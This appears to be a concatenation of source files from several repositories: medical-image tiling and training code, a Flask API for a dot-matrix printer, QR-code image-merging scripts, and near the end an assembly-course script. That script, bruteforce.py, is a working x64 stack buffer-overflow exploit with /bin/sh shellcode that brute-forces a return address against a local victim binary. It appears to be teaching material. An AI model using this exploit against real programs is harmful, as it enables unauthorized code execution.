    coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)
    coord = []
    reject = []
    tile_img = []
    for cy in coord_y:
        for cx in coord_x:
            # Windowed read of the tile from the original TIFF (bands 1-3).
            img = dataset.read(
                [1,2, 3],
                window=Window.from_slices((cy-half, cy+half), (cx-half, cx+half))
            ).transpose(1,2,0)
            # Resize down to the working scale.
            img = cv2.resize(
                img,
                dsize=None,
                fx=img_scale,
                fy=img_scale,
                interpolation = cv2.INTER_AREA
            )
            # Reject tiles with too little tissue (HSV saturation score).
            structure = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
            structure = (structure[:, :, 1] > 32).astype(np.uint8)
            structure = structure.astype(np.float32)
            curr_val = structure.mean()
            if curr_val>tile_min_score:
                coord.append([int(cx*img_scale), int(cy*img_scale), curr_val])
                tile_img.append(img)
            else:
                reject.append([int(cx*img_scale), int(cy*img_scale), curr_val])
    return {
        'coord': coord,
        'reject': reject,
        'img_tile': tile_img,
    }
def create_tile_subm(img, img_scale, tile_min_score, tile_size, tile_avg_step):
    '''
    create_tile_subm()> Dict:
    In-memory tiling for submission (no mask available).
    INPUT:
    ------
    img: tiff img full shape (H,W,C)
    img_scale: scale to resize original image
    img_min_score: filter image with min score (prevent empty tile)
    tile_size: size of the tile (at the rescaled resolution)
    tile_avg_step: average step for tile creation
    '''
    half = tile_size//2
    #TODO: try other interpolations (INTER_LINEAR etc.)
    img_small = cv2.resize(img, dsize=None, fx=img_scale, fy=img_scale, interpolation = cv2.INTER_AREA)
    # Tissue score: fraction of pixels with HSV saturation above 32.
    structure = cv2.cvtColor(img_small, cv2.COLOR_RGB2HSV)
    structure = (structure[:, :, 1] > 32).astype(np.uint8)
    structure = structure.astype(np.float32)
    h, w, _ = img_small.shape
    # Grid of tile centres covering the rescaled image.
    coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
    coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)
    coord = []
    reject = []
    for cy in coord_y:
        for cx in coord_x:
            # Skip tiles that contain (almost) no tissue.
            curr_val = structure[cy-half:cy+half, cx-half:cx+half].mean()
            if curr_val>tile_min_score:
                coord.append([cx, cy, curr_val])
            else:
                reject.append([cx, cy, curr_val])
    # Cut the accepted tiles out of the resized image.
    tile_img = []
    for cx, cy, cv in coord:
        im = img_small[cy-half:cy+half,cx-half:cx+half]
        tile_img.append(im)
    return {
        'coord': coord,
        'reject': reject,
        'img': img_small,
        'img_tile': tile_img,
        'structure': structure,
    }
def to_mask(tile, tile_coord, img_height, img_width, tile_size, aggregate='mean'):
    '''
    Stitch per-tile predictions back into one full-size mask.

    Overlapping tiles are blended with a pyramid-shaped weight (peak at the
    tile centre, zero on the border), and the weighted sum is normalised by
    the accumulated weight — the U-Net paper's "Overlap-tile strategy for
    seamless segmentation of arbitrary large images".

    tile: list/array of per-tile predictions, each (tile_size, tile_size)
    tile_coord: iterable of (cx, cy, score) tile-centre coordinates
    img_height / img_width: size of the (resized) output image
    tile_size: side of the square tiles
    aggregate: kept for interface compatibility (only weighted mean is implemented)
    '''
    half = tile_size//2
    mask = np.zeros((img_height, img_width), np.float32)
    count = np.zeros((img_height, img_width), np.float32)
    # Pyramid weight: distance to the nearest tile border, normalised to [0, 1].
    # (The old `w = np.ones(...)` line was dead code — immediately overwritten.)
    y,x = np.mgrid[-half:half,-half:half]
    y = half-abs(y)
    x = half-abs(x)
    w = np.minimum(x,y)
    w = w/w.max()
    w = np.minimum(w,1)
    # Accumulate weighted predictions and weights.
    for t, (cx, cy, cv) in enumerate(tile_coord):
        mask [cy - half:cy + half, cx - half:cx + half] += tile[t]*w
        count[cy - half:cy + half, cx - half:cx + half] += w
    # Normalise only where at least one tile contributed.
    m = (count != 0)
    mask[m] /= count[m]
    return mask
def global_shift_mask(maskpred1, y_shift, x_shift):
    """
    Shift a 2-D mask by (y_shift, x_shift) pixels, zero-filling the vacated
    region (pad on one side, crop from the other). Positive shifts move the
    content down/right; output shape equals the input shape.
    """
    rows, cols = maskpred1.shape
    # Pad before the content for a positive shift, after it for a negative one.
    pad_y = (abs(y_shift), 0) if y_shift >= 0 else (0, abs(y_shift))
    pad_x = (abs(x_shift), 0) if x_shift >= 0 else (0, abs(x_shift))
    padded = np.pad(maskpred1, [pad_y, pad_x], mode='constant', constant_values=0)
    # Crop back to the original size from the matching side.
    row_window = slice(0, rows) if y_shift >= 0 else slice(abs(y_shift), abs(y_shift) + rows)
    col_window = slice(0, cols) if x_shift >= 0 else slice(abs(x_shift), abs(x_shift) + cols)
    return padded[row_window, col_window]
GenoM87/hubmap | src/data_builder/__init__.py | <filename>src/data_builder/__init__.py
from .builder import build_train_loader
from .builder import build_valid_loader |
GenoM87/hubmap | src/data_builder/builder.py | <gh_stars>0
import os
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler
import albumentations as A
import pandas as pd
from .dataset import hmTrainDataset, hmTestDataset
from .transforms import get_train_transform, get_valid_transform
def build_train_loader(cfg):
    """Build the training DataLoader.

    Uses all image ids found in the tile coord.csv except the validation
    ids, with the training augmentations and a random sampler.
    """
    df = pd.read_csv(
        os.path.join(cfg.DATASET.TILE_DIR, 'coord.csv')
    )
    # Everything that is not held out for validation is used for training.
    train_ids = set(df['image_id']) - set(cfg.DATASET.VALID_ID)
    train_transform = get_train_transform(cfg)
    train_dataset = hmTrainDataset(
        df = df,
        img_ids = list(train_ids),
        cfg = cfg,
        transforms=train_transform
    )
    train_loader = DataLoader(
        dataset=train_dataset,
        sampler=RandomSampler(train_dataset),
        drop_last=True,
        batch_size=cfg.TRAIN_LOADER.BATCH_SIZE,
        num_workers=cfg.TRAIN_LOADER.NUM_WORKERS
    )
    return train_loader
def build_valid_loader(cfg):
    """Build the validation DataLoader.

    Uses only cfg.DATASET.VALID_ID image ids, the no-augmentation valid
    transform and a sequential sampler (keeps every sample, in order).
    """
    valid_transform = get_valid_transform(cfg)
    df = pd.read_csv(
        os.path.join(cfg.DATASET.TILE_DIR, 'coord.csv')
    )
    valid_dataset = hmTrainDataset(
        df = df,
        img_ids = cfg.DATASET.VALID_ID,
        cfg = cfg,
        transforms=valid_transform
    )
    valid_loader = DataLoader(
        dataset=valid_dataset,
        sampler=SequentialSampler(valid_dataset),
        drop_last=False,
        batch_size=cfg.VALID_LOADER.BATCH_SIZE,
        num_workers=cfg.VALID_LOADER.NUM_WORKERS
    )
    return valid_loader
GenoM87/hubmap | src/create_tile.py | import os
import cv2
import pandas as pd
import numpy as np
import rasterio
from utils import create_tile, read_tiff, rle2mask, create_tile_v2
from config import _C as cfg
# Tiling parameters taken from the training section of the config.
img_scale = cfg.DATASET.IMG_SCALE
tile_size = cfg.DATASET.TRAIN_TILE_SIZE
tile_avg_step = cfg.DATASET.TRAIN_TILE_AVG_STEP
tile_min_score = cfg.DATASET.TRAIN_TILE_MIN_SCORE

if __name__ == "__main__":
    # Generate tiles for every training image and write a coord.csv index.
    df_train = pd.read_csv(os.path.join(cfg.DATA_DIR, 'train.csv'))
    # Folder name encodes the tiling parameters so runs don't collide.
    path_tile = f'{img_scale}_{tile_min_score}_{tile_size}_{tile_avg_step}_train'
    IMG_OUT = os.path.join(cfg.DATA_DIR, 'train', path_tile)
    os.makedirs(IMG_OUT, exist_ok=True)
    print(path_tile)
    # Collect per-image coordinate frames; concatenated once at the end.
    # BUGFIX/modernisation: DataFrame.append was deprecated and removed in
    # pandas 2.0 — use pd.concat over a list instead.
    coord_frames = []
    for cnt, row in df_train.iterrows():
        img_id, encoding = row['id'], row['encoding']
        path_image = os.path.join(cfg.DATA_DIR, 'train', img_id+'.tiff')
        os.makedirs(os.path.join(IMG_OUT, img_id), exist_ok=True)
        print(f'CREATING TILE FOR IMAGE {img_id}')
        res = create_tile_v2(
            img_id,
            df_train,
            cfg,
            phase='train'
        )
        # Tile-centre coordinates and tissue scores for this image.
        df_image = pd.DataFrame()
        coord = np.array(res['coord'])
        df_image['cx']=coord[:,0].astype(np.int32)
        df_image['cy']=coord[:,1].astype(np.int32)
        df_image['cv']=coord[:,2]
        df_image['image_id'] = img_id
        coord_frames.append(df_image)
        # Write each tile and its mask as PNGs named by the tile centre.
        tile_id = []
        for i in range(len(res['coord'])):
            cx, cy, cv = res['coord'][i]
            s = f'x{cx}_y{cy}'
            tile_id.append(s)
            tile_img = res['img_tile'][i]
            tile_mask = res['mask_tile'][i]
            cv2.imwrite(os.path.join(IMG_OUT, img_id, f'{s}.png'), tile_img)
            cv2.imwrite(os.path.join(IMG_OUT, img_id, f'{s}.mask.png'), tile_mask)
    df_coord = pd.concat(coord_frames, ignore_index=True) if coord_frames else pd.DataFrame()
    df_coord.to_csv(os.path.join(IMG_OUT, 'coord.csv'), index=False)
|
GenoM87/hubmap | src/main.py | <reponame>GenoM87/hubmap<gh_stars>0
import sys, os, time, logging, datetime
from pathlib import Path
from engine.fitter import Fitter
from config import _C as cfg
from models.model import build_model
from data_builder import build_valid_loader, build_train_loader
# Create the per-run experiment directory: experiments/<model>/<date>/.
path_exp = os.path.join(
    cfg.PROJECT_DIR, 'experiments', cfg.MODEL.NAME, str(datetime.date.today())
)
Path(path_exp).mkdir(parents=True, exist_ok=True)
# Set up a file logger for this run, named with the start timestamp.
path_logger = os.path.join(
    path_exp, f'train-{datetime.datetime.now()}.log'
)
logging.basicConfig(filename=path_logger, level=logging.DEBUG)
logger = logging.getLogger()

if __name__ == "__main__":
    # Build model and loaders, then run training + final full-image evaluation.
    model = build_model(cfg)
    train_loader = build_train_loader(cfg)
    valid_loader = build_valid_loader(cfg)
    engine = Fitter(
        model=model,
        cfg=cfg,
        train_loader=train_loader,
        val_loader=valid_loader,
        logger=logger,
        exp_path=path_exp
    )
    engine.train()
    engine.final_check()
    #engine.compute_shift()
kylemikableh/KyAPI | main.py | <reponame>kylemikableh/KyAPI<filename>main.py
"""
PiPrint API
Print anything to a (DotMatrix) printer and log from REST
MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os.path
import platform
import subprocess
from datetime import datetime
from strenum import StrEnum
from flask import Flask
from flask import request
from flask_restful import Api

# Flask application plus the flask-restful wrapper (the Api object is only
# constructed here; routes below use plain Flask decorators).
app = Flask(__name__)
api = Api(app)

# REST Get Parameters
ARG_KEY = 'key'  # query parameter carrying the API key
ARG_PRINT_DATA = 'pdata'  # query parameter carrying the text to print

# FILE Names and paths (all relative to the working directory)
KEYFILE_FILE = 'keys.txt'  # one valid API key per line
PRINTLOG_FILE = 'print.log'  # append-only log of everything printed
TEMPPRINT_FILE = 'tempprint.txt'  # spool file handed to the OS print command
class Platform(StrEnum):
    """
    Class for enums of Platforms to detect.

    Values match the strings returned by platform.system(), so members
    compare equal to that call's result directly.
    """
    LINUX = "Linux"
    MAC = "Darwin"
    WINDOWS = "Windows"
def create_default_files():
    """
    Generate default files for the API server.

    Creates the key file (prompting interactively for the first key when it
    is missing), the print log, and the temporary spool file.
    :return: None
    """
    if not os.path.exists(KEYFILE_FILE):
        # Prompt before opening so an interrupted prompt does not leave an
        # empty key file behind; the context manager closes the handle.
        default_key = input("No keys file detected! Please enter first API key: ")
        with open(KEYFILE_FILE, 'w', encoding="utf8") as fp:
            fp.write(default_key)
    if not os.path.exists(PRINTLOG_FILE):
        # 'x' mode: create-exclusive, guarded by the existence check above.
        with open(PRINTLOG_FILE, 'x', encoding="utf8"):
            pass
    if not os.path.exists(TEMPPRINT_FILE):
        with open(TEMPPRINT_FILE, 'x', encoding="utf8"):
            pass
def contains_required_args(request_passed):
    """
    Check if the request contains an API key.

    :param request_passed: the URL request
    :return: True if contains the key, False otherwise (missing or empty)
    """
    # args.get() yields None when the parameter is absent; both None and an
    # empty string are falsy, matching the original "if not key" behaviour.
    return bool(request_passed.args.get(ARG_KEY))
def get_dict_of_keys():
    """
    Grab all valid API keys from file.

    Despite the name, this returns a *list* of key strings, one per line
    of the key file.
    :return: dict of string of keys (actually list[str])
    """
    with open(KEYFILE_FILE, encoding="utf8") as key_file:
        keys = key_file.read().splitlines()
        return keys
def verify(request_passed):
    """
    Verify that the key passed is valid.

    :param request_passed: URL request passed
    :return: True if key is valid; False for unknown keys or when the key
        file is missing (fail closed)
    """
    params = request_passed.args
    key = params.get(ARG_KEY)
    key_file_exists = os.path.exists(KEYFILE_FILE)
    if key_file_exists:
        # The key file is re-read on every request, so keys can be added
        # without restarting the server.
        keys = get_dict_of_keys()
        if key not in keys:
            return False
        return True
    # No key file at all: reject everything and log why.
    error = '''API Key File {} was not found,
    rejecting all requests'''.format(KEYFILE_FILE)  # pylint: disable=consider-using-f-string
    app.logger.error(error)  # pylint: disable=no-member
    return False
def format_for_dot_matrix(data):
    """
    Format the data for the DotMatrix printer.

    :param data: String data to print to printer
    :return: the data prefixed with a "[MM/DD/YY/HH:MM:SS] " timestamp
    """
    stamp = datetime.now().strftime("[%m/%d/%y/%H:%M:%S] ")
    return stamp + data
def print_to_locations():
    """
    Send print data to printing locations (the append-only log file and the
    physical printer).

    Must be called inside a Flask request context; reads ARG_PRINT_DATA from
    the query string.
    :return: String of status (HTML fragment for the browser)
    """
    params = request.args
    data = params.get(ARG_PRINT_DATA)
    if not data:
        return '''Did not recieve any print data. Not printing.'''
    app.logger.info('''Recieved print data: {}'''.format(data))  # pylint: disable=no-member,consider-using-f-string
    formatted_data = format_for_dot_matrix(data)
    if os.path.exists(PRINTLOG_FILE):
        app.logger.info('''Printing to logfile recieved print data''')  # pylint: disable=no-member
        # Context manager guarantees the handle is flushed and closed even
        # if the write raises (the original leaked on exceptions).
        with open(PRINTLOG_FILE, 'a', encoding="utf8") as log_file:
            log_file.write(formatted_data + "\n")
    else:
        app.logger.error('''Missing print file, please restart server.''')  # pylint: disable=no-member
    print_status = print_to_printer(formatted_data)
    app.logger.error('''Print status: {}'''.format(print_status))  # pylint: disable=no-member,consider-using-f-string
    return '''Recieved print data: {}.<br> Printer status:<br>{}'''.format(data, print_status)  # pylint: disable=consider-using-f-string
def cups_hold_release():
    """
    For CUPS we need to hold the print and set the release to 1 second later'
    (This is a workaround for CUPS always printing the previous document
    for some reason, this is supposed to fix that) (Currently not working)
    :return:
    """
    now = datetime.now()
    dt_hour_str = now.strftime("%H")
    dt_min_str = now.strftime("%M")
    dt_sec_str = now.strftime("%S")
    dt_sec_str = str(int(dt_sec_str) + 1)  # add one sec for printing a second from now
    # Handle edge cases/cascades
    if int(dt_sec_str) > 59:
        dt_sec_str = "0"
        dt_min_str = str(int(dt_min_str) + 1)  # add one min
    if int(dt_min_str) > 59:
        dt_min_str = "0"
        dt_hour_str = str(int(dt_hour_str) + 1)
    if int(dt_hour_str) > 23:
        dt_hour_str = "0"
    # NOTE(review): str(int(...) + 1) drops zero-padding (e.g. "7" not "07");
    # confirm lp's job-hold-until accepts unpadded fields before relying on
    # this. Also note the triple-quoted command embeds a trailing
    # newline/indent inside the shell string.
    cmd = '''lp -o raw -o job-hold-until={}:{}:{} {}
    '''.format(dt_hour_str, dt_min_str, dt_sec_str, TEMPPRINT_FILE)  # pylint: disable=consider-using-f-string
    subprocess.run(cmd, shell=True, check=True)
def print_to_printer(data):
    """
    Print to printer: spool *data* into the temp file and hand it to the
    platform's print facility (startfile on Windows, lp on Linux).

    :param data: pre-formatted string to print
    :return: human-readable platform/status string
    """
    # Context managers replace the original open/close pairs, so the spool
    # file is closed even if a write fails.
    with open(TEMPPRINT_FILE, 'w', encoding="utf8") as log_file:
        log_file.write('\n')  # Fix for CUPS not printing the first line
        log_file.write(data)
    current_platform = platform.system()
    app.logger.error('''Printing to printer with os: {}'''.format(current_platform))  # pylint: disable=no-member,consider-using-f-string
    # Read the spool back purely for logging/diagnostics.
    with open(TEMPPRINT_FILE, encoding="utf8") as key_file:
        key = key_file.read()
    app.logger.error('''File to print contains: {}'''.format(key))  # pylint: disable=no-member,consider-using-f-string
    if current_platform == Platform.WINDOWS:
        os.startfile(TEMPPRINT_FILE, "print")
        return '''Platform detected: WINDOWS'''
    if current_platform == Platform.MAC:
        return '''Platform detected: MAC'''
    if current_platform == Platform.LINUX:
        cmd = '''lp -o raw {}'''.format(TEMPPRINT_FILE)  # pylint: disable=consider-using-f-string
        subprocess.run(cmd, shell=True, check=True)
        return '''Platform detected: LINUX'''
    # BUG FIX: previously this always reported Platform.MAC; report the
    # platform we actually detected and failed to match.
    return '''Did not find platform: {}'''.format(current_platform)  # pylint: disable=consider-using-f-string
@app.route('/', methods=['GET'])
def home():
    """
    Default home landing page. Shouldn't do anything, might add documentation or something.

    No API key required for this route.
    :return: static HTML fragment
    """
    return '''<html><head><title>PiPrint API</title></head><h1>PiPrint API</h1>
    <p>Kyle's simple API server. Must supply path and API key for access.</p></html>'''
@app.route('/print', methods=['GET'])
def print_request():
    """
    The print path: authenticate the request, then dispatch the print job.

    :return: String to return to browser, e.g. HTML
    """
    # Guard clauses replace the original nested ifs; same strings, same order
    # of checks (presence of the key first, then validity).
    if not contains_required_args(request):
        return '''API key not provided'''
    if not verify(request):
        return '''API Key invalid'''
    # We have been verified, now do function
    return print_to_locations()
if __name__ == '__main__':
    create_default_files()
    # Tell the operator where the log and key files live before serving.
    print(f"Log file is located at: {os.path.abspath(PRINTLOG_FILE)}")
    print(f"Key file is located at: {os.path.abspath(KEYFILE_FILE)}")
    # Listen on all interfaces; debug=True enables the reloader/debugger.
    app.run('0.0.0.0', port=5000, debug=True)
|
importerror/Python-QR-code | Comb_image1.py | from qrcode import *
import re, sys
import Image

# Combine 90 QR-code scans into one contact sheet.
# The scans are listed in paste order: column-major, 9 columns x 10 rows
# (this replaces ~270 copy-pasted open/thumbnail/paste lines; the files,
# order, grid positions and output are identical to the original script).
SCAN_FILES = [
    'scan49M.png', 'scan50N.png', 'scan52O.png', 'scan54P.png', 'scan58Q.png',
    'scan60R.png', 'scan64S.png', 'scan66T.png', 'scan70U.png', 'scan76V.png',
    'scan78W.png', 'scan84X.png', 'scan88Y.png', 'scan90Z.png', 'scan94A.png',
    'scan100B.png', 'scan106C.png', 'scan108D.png', 'scan114E.png', 'scan118F.png',
    'scan120G.png', 'scan126H.png', 'scan130I.png', 'scan136J.png', 'scan144K.png',
    'scan148L.png', 'scan150M.png', 'scan154N.png', 'scan156O.png', 'scan160P.png',
    'scan174Q.png', 'scan178R.png', 'scan184S.png', 'scan186T.png', 'scan196U.png',
    'scan198V.png', 'scan204W.png', 'scan210X.png', 'scan214Y.png', 'scan220Z.png',
    'scan226A.png', 'scan228B.png', 'scan238C.png', 'scan240D.png', 'scan244E.png',
    'scan246F.png', 'scan258G.png', 'scan270H.png', 'scan274I.png', 'scan276J.png',
    'scan280K.png', 'scan286L.png', 'scan288M.png', 'scan298N.png', 'scan304O.png',
    'scan310P.png', 'scan316Q.png', 'scan318R.png', 'scan324S.png', 'scan328T.png',
    'scan330U.png', 'scan340V.png', 'scan354W.png', 'scan358X.png', 'scan360Y.png',
    'scan364Z.png', 'scan378A.png', 'scan384B.png', 'scan394C.png', 'scan396D.png',
    'scan400E.png', 'scan406F.png', 'scan414G.png', 'scan420H.png', 'scan426I.png',
    'scan430J.png', 'scan436K.png', 'scan444L.png', 'scan448M.png', 'scan456N.png',
    'scan466O.png', 'scan468P.png', 'scan478Q.png', 'scan480R.png', 'scan486S.png',
    'scan490T.png', 'scan496U.png', 'scan504V.png', 'scan508W.png', 'scan510X.png',
]

CELL = 110  # grid pitch in pixels; thumbnails are shrunk to fit one cell
Final_img = Image.new('RGB', (1300, 1000))
for idx, fname in enumerate(SCAN_FILES):
    tile = Image.open(fname)
    tile.thumbnail((CELL, CELL))
    # Column-major layout: fill 10 tiles down each column, then move right.
    Final_img.paste(tile, ((idx // 10) * CELL, (idx % 10) * CELL))
Final_img.save('Final image1.png')
|
importerror/Python-QR-code | Comb_image2.py | from qrcode import *
import re, sys
import Image

# Combine the second batch of 90 QR-code scans into one contact sheet.
# Listed in paste order: column-major, 9 columns x 10 rows (replaces the
# original's ~270 copy-pasted open/thumbnail/paste lines with identical
# files, order, grid positions and output).
SCAN_FILES = [
    'scan510X.png', 'scan514Y.png', 'scan526Z.png', 'scan534A.png', 'scan538B.png',
    'scan546C.png', 'scan550D.png', 'scan556E.png', 'scan568F.png', 'scan570G.png',
    'scan588H.png', 'scan594I.png', 'scan604J.png', 'scan610K.png', 'scan616L.png',
    'scan618M.png', 'scan624N.png', 'scan634O.png', 'scan640P.png', 'scan646Q.png',
    'scan648R.png', 'scan654S.png', 'scan660T.png', 'scan664U.png', 'scan666V.png',
    'scan678W.png', 'scan688X.png', 'scan690Y.png', 'scan694Z.png', 'scan700A.png',
    'scan706B.png', 'scan708C.png', 'scan720D.png', 'scan724E.png', 'scan730F.png',
    'scan738G.png', 'scan748H.png', 'scan756I.png', 'scan766J.png', 'scan774K.png',
    'scan780L.png', 'scan786M.png', 'scan790N.png', 'scan798O.png', 'scan804P.png',
    'scan808Q.png', 'scan816R.png', 'scan820S.png', 'scan834T.png', 'scan844U.png',
    'scan856V.png', 'scan858W.png', 'scan868X.png', 'scan870Y.png', 'scan874Z.png',
    'scan876A.png', 'scan886B.png', 'scan900C.png', 'scan904D.png', 'scan906E.png',
    'scan910F.png', 'scan924G.png', 'scan928H.png', 'scan930I.png', 'scan934J.png',
    'scan954K.png', 'scan958L.png', 'scan966M.png', 'scan976N.png', 'scan984O.png',
    'scan988P.png', 'scan994Q.png', 'scan1000R.png', 'scan1014S.png', 'scan1018T.png',
    'scan1024U.png', 'scan1030V.png', 'scan1038W.png', 'scan1044X.png', 'scan1056Y.png',
    'scan1060Z.png', 'scan1066A.png', 'scan1068B.png', 'scan1078C.png', 'scan1080D.png',
    'scan1086E.png', 'scan1096F.png', 'scan1098G.png', 'scan1108H.png', 'scan1110I.png',
]

CELL = 110  # grid pitch in pixels; thumbnails are shrunk to fit one cell
Final_img = Image.new('RGB', (1300, 1000))
for idx, fname in enumerate(SCAN_FILES):
    tile = Image.open(fname)
    tile.thumbnail((CELL, CELL))
    # Column-major layout: fill 10 tiles down each column, then move right.
    Final_img.paste(tile, ((idx // 10) * CELL, (idx % 10) * CELL))
Final_img.save('Final image2.png')
|
importerror/Python-QR-code | Merge_Images_dir.py | <reponame>importerror/Python-QR-code
from qrcode import *
import re, sys
import Image

#Prime Number generator part
def isPrime(n):
    # Regex primality trick: '1'*n matches the pattern iff n is 0/1 or
    # composite, so "no match" means prime.
    return re.match(r'^1?$|^(11+?)\1+$', '1' * n) == None

N = 249 #students
M = 100
l = list()
# Letter cycle appended to each filename; 'restart' marks the wrap point.
A=['M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H',
'I','J','K','L','restart']
# Collect at least N primes, scanning candidates in batches of 100.
while len(l) < N:
    l += filter(isPrime, range(M - 100, M))
    M += 100
Values=list()
j=0
# Build 'scan<prime+47><letter>.png' names, one per prime.
for i in l:
    # NOTE(review): j is never reset when the sentinel is reached, so this
    # iteration appends 'restart' into the filename and j then runs past the
    # end of A (IndexError). Reassigning the identical list does not fix it;
    # j most likely needs to wrap (e.g. j %= 26).
    if A[j]=='restart':
        A=['M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','restart']
    Values.append('scan'+str(i+47)+A[j]+'.png')
    j+=1
flag=0
l=0
# Paste each scan as an 11x8 grid of 100px cells into its own canvas.
for k in Values:
    img=Image.open(k)
    Final_img=Image.new('RGB',(1100,800))
    img.thumbnail((110,110))
    for i in xrange(0,1100,100):
        for j in xrange(0,800,100):
            flag+=1
            Final_img.paste(img,(i,j))
    # NOTE(review): flag grows by 88 per image, so only 88 and 176 are ever
    # hit; flag==249 is unreachable, and its branch would overwrite
    # 'Final image2.png' anyway (probably meant 'Final image3.png').
    if flag==88:
        Final_img.save('Final image1.png')
    elif flag==176:
        Final_img.save('Final image2.png')
    elif flag==249:
        Final_img.save('Final image2.png')
|
importerror/Python-QR-code | merge_image.py | import Image
# Tile one scanned QR code across an 1100x800 canvas on a 100px grid.
canvas = Image.new('RGB', (1100, 800))
source = Image.open("scan1.png")
source.thumbnail((110, 110))  # shrink in place to fit one grid cell
for x in xrange(0, 1100, 100):
    for y in xrange(0, 800, 100):
        canvas.paste(source, (x, y))
canvas.save('new scan1.png')
canvas.show()
|
importerror/Python-QR-code | PrimeNumber.py | import re, sys
def isPrime(n):
    """Return True when *n* is prime.

    Trial division by 2 and the odd numbers up to sqrt(n). Replaces the
    regex-backtracking trick, which built a string of length n and
    backtracked over it; results are identical (0 and 1 are not prime).
    """
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    factor = 3
    while factor * factor <= n:
        if n % factor == 0:
            return False
        factor += 2
    return True

N = 249 #students
M = 100
l = list()
# Collect primes in batches of 100 candidates until we have at least N.
# The final batch may push len(l) slightly past N; as in the original,
# every collected prime is printed.
while len(l) < N:
    l += filter(isPrime, range(M - 100, M))
    M += 100
for i in l:
    # print(i) behaves identically under Python 2 and 3
    # (the original "print i" was Python-2 only).
    print(i)
|
importerror/Python-QR-code | Comb_image3.py | <filename>Comb_image3.py<gh_stars>0
from qrcode import *
import re, sys
import Image

# Combine the final batch of 71 QR-code scans into one contact sheet.
# Listed in paste order: column-major, 10 tiles per column (the last column
# holds a single tile). Replaces ~210 copy-pasted lines with identical
# files, order, grid positions and output.
SCAN_FILES = [
    'scan1116J.png', 'scan1134K.png', 'scan1138L.png', 'scan1140M.png', 'scan1144N.png',
    'scan1150O.png', 'scan1156P.png', 'scan1164Q.png', 'scan1170R.png', 'scan1176S.png',
    'scan1198T.png', 'scan1200U.png', 'scan1210V.png', 'scan1218W.png', 'scan1228X.png',
    'scan1234Y.png', 'scan1240Z.png', 'scan1248A.png', 'scan1260B.png', 'scan1264C.png',
    'scan1270D.png', 'scan1276E.png', 'scan1278F.png', 'scan1284G.png', 'scan1296H.png',
    'scan1306I.png', 'scan1324J.png', 'scan1326K.png', 'scan1330L.png', 'scan1336M.png',
    'scan1338N.png', 'scan1344O.png', 'scan1348P.png', 'scan1350Q.png', 'scan1354R.png',
    'scan1366S.png', 'scan1368T.png', 'scan1374U.png', 'scan1408V.png', 'scan1414W.png',
    'scan1420X.png', 'scan1428Y.png', 'scan1446Z.png', 'scan1456A.png', 'scan1470B.png',
    'scan1474C.png', 'scan1476D.png', 'scan1480E.png', 'scan1486F.png', 'scan1494G.png',
    'scan1498H.png', 'scan1500I.png', 'scan1506J.png', 'scan1518K.png', 'scan1528L.png',
    'scan1530M.png', 'scan1534N.png', 'scan1536O.png', 'scan1540P.png', 'scan1546Q.png',
    'scan1558R.png', 'scan1570S.png', 'scan1578T.png', 'scan1590U.png', 'scan1596V.png',
    'scan1600W.png', 'scan1606X.png', 'scan1614Y.png', 'scan1618Z.png', 'scan1626A.png',
    'scan1630B.png',
]

CELL = 110  # grid pitch in pixels; thumbnails are shrunk to fit one cell
Final_img = Image.new('RGB', (1600, 1200))
for idx, fname in enumerate(SCAN_FILES):
    tile = Image.open(fname)
    tile.thumbnail((CELL, CELL))
    # Column-major layout: fill 10 tiles down each column, then move right.
    Final_img.paste(tile, ((idx // 10) * CELL, (idx % 10) * CELL))
Final_img.save('Final image3.png')
|
bplinux/asm | examples/x64/02/bruteforce.py | <gh_stars>0
#!/usr/bin/python
"""Brute-force the stack address of the NOP sled in ./victim_weak.

Repeatedly runs the victim with an overflow payload, sliding the candidate
return address upward by 8 bytes until the victim exits cleanly (i.e. the
shellcode executed).
"""
import subprocess
import struct
import sys

buffsize = 512
offset = 0
start = 0x7fffffffd9e0  # first candidate stack address
end = 0x7fffffffe000

# /bin/sh execve shellcode
sc = b'\xeb\x14\x5f\x48\x31\xc0\x88\x47\x07\x50\x57\x48\x8d\x34\x24\xb0\x3b\x48\x31\xd2\x0f\x05\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'
# Layout: [NOP sled][shellcode][8 NOPs][fake RBP][candidate RIP]
nopsled1 = b'\x90' * (buffsize - len(sc) - 8)
nopsled2 = b'\x90' * 8
rbp = b'\x90' * 8
rip = struct.pack("<Q", start)
payload = nopsled1 + sc + nopsled2 + rbp + rip

returnvalue = -1
while returnvalue != 0:
    try:
        # payload[:-2] trims the high two (zero) bytes of the packed address.
        returnvalue = subprocess.call(['./victim_weak', payload[:-2]])
    except Exception:
        # BUG FIX: was a bare "except:", which also swallowed
        # KeyboardInterrupt/SystemExit and made the loop unstoppable.
        # A crash of the victim just means "wrong address" -- keep probing.
        pass
    print("Trying " + str(rip))
    start += 8
    rip = struct.pack("<Q", start)
    payload = nopsled1 + sc + nopsled2 + rbp + rip
|
bplinux/asm | examples/x64/01/control_rip.py | <gh_stars>0
#!/usr/bin/python
